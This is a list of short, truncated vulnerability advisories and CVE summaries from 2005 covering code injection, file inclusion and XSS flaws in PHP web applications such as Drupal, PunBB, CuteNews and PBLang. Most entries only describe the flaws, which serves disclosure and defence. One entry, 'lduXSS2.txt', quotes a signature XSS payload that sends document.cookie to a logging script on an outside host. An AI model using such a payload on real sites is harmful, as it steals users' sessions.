Debian DSA-840-1 : drupal - missing input sanitising

Stefan Esser of the Hardened-PHP Project reported a serious vulnerability in the third-party XML-RPC library included with some Drupal versions. An attacker could execute arbitrary PHP code on a target site. This update pulls in the latest XML-RPC version from upstream. %NASLMINLEVEL 70300 C...

Debian DSA-842-1 : egroupware - missing input sanitising

Stefan Esser discovered a vulnerability in the XML-RPC libraries which are also present in egroupware, a web-based groupware suite, that allows injection of arbitrary PHP code into eval statements. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text and package checks in thi...

SQL injection and PHP code execution

Wolfgang Ziegler has discovered multiple security vulnerabilities in the contributed flexinode module. Versions affected Please check the CVS $Id$ fields in the following files to determine whether the version of the flexinode module you are running is vulnerable. All versions older than the...

MolyX vulnerability analysis-vulnerability warning-the black bar safety net

Text/SuperHei·Safety AngelS4T 2005.09.21 Nonsense: MolyX Board（hereinafter referred to MXB is MolyX Studios group as if that is CNVBB team development of PHP Forum program, MXB fusion of many forums, absorbing, powerful. The multi-year Forum program finished and improved experience also makes the...

PunBB < 1.2.8 Multiple Vulnerabilities

According to its banner, the version of PunBB installed on the remote host suffers from several flaws. - A File Include Vulnerability The application fails to validate the 'language' parameter when a user updates his profile and uses that throughout the application to require PHP code in order to...

PunBB < 1.2.8 Multiple Vulnerabilities

Binary data 3235.prm...

CVE-2005-3010

CVE-2005-3010 affects CuteNews (version 1.4.0 and earlier). A direct static code injection vulnerability in the flood protection feature (inc/shows.inc.php) allows a remote attacker to inject and execute arbitrary PHP code via the HTTP_CLIENT_IP header (Client-Ip), which is injected into data/flo...

CuteNews flood.db.php HTTP Header PHP Code Injection

Binary data 3230.prm...

CVE-2005-2893

Direct static code injection vulnerability in setcookie.php in PBLang 4.65, and possibly earlier versions, allows remote attackers to execute arbitrary PHP code via the username u parameter, which is directly injected into a file that is later executed upon login...

CVE-2005-2893

CVE-2005-2893 affects PBLang 4.65 (and possibly earlier). The vulnerability is a direct static code injection in setcookie.php where the username parameter (u) is directly injected into a file that is later executed upon login, enabling remote code execution. The available sources identify the vu...

CVE-2005-2893

Direct static code injection vulnerability in setcookie.php in PBLang 4.65, and possibly earlier versions, allows remote attackers to execute arbitrary PHP code via the username u parameter, which is directly injected into a file that is later executed upon login...

AMember Multiple Script config[root_dir] Parameter Remote File Inclusion

The remote host appears to be running AMember, a commercial membership and subscription management script written in PHP. The version of AMember installed on the remote host fails to properly sanitize user-supplied input to the 'configrootdir' parameter before using it in several scripts to inclu...

CVE-2005-2775

phpapi.php in phpWebNotes 2.0.0 uses the extract function to modify key variables such as $tpathcore, which leads to a PHP file inclusion vulnerability that allows remote attackers to execute arbitrary PHP code via the tpathcore parameter...

CVE-2005-2781

The Avatar upload feature in FUD Forum before 2.7.0 does not properly verify uploaded files, which allows remote attackers to execute arbitrary PHP code via a file with a .php extension that contains image data followed by PHP code...

CVE-2005-2793

PHP remote file inclusion vulnerability in welcome.php in phpLDAPadmin 0.9.6 and 0.9.7 allows remote attackers to execute arbitrary PHP code via the customwelcomepage parameter...

Simple Machines Forum < 1.0.7 Code Injection

Binary data 3198.prm...

lduXSS2.txt

Bug finder:spyMASter Web site:Realhackers.net Contact:[email protected] LDU has some xss vulns Firstly you can use html codes in your signature you can get cookies with this put your signature that code location.href='http://site.com/log/ekle.php?c='+escapedocument. cookie and post a topic...

CMS Made Simple 0.10 - &#039;Lang.php&#039; Remote File Inclusion

source: https://www.securityfocus.com/bid/14709/info CMS Made Simple is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may exploit this issue to execute arbitrary remote PHP code on an affected...

phpGroupWare: Multiple vulnerabilities

Background phpGroupWare is a multi-user groupware suite written in PHP. Description phpGroupWare improperly validates the "mid" parameter retrieved via a forum post. The current version of phpGroupWare also adds several safeguards to prevent XSS issues, and disables the use of a potentially...

Debian DSA-789-1 : php4 - several vulnerabilities

Several security related problems have been found in PHP4, the server-side, HTML-embedded scripting language. The Common Vulnerabilities and Exposures project identifies the following problems : - CAN-2005-1751 Eric Romang discovered insecure temporary files in the shtool utility shipped with PHP...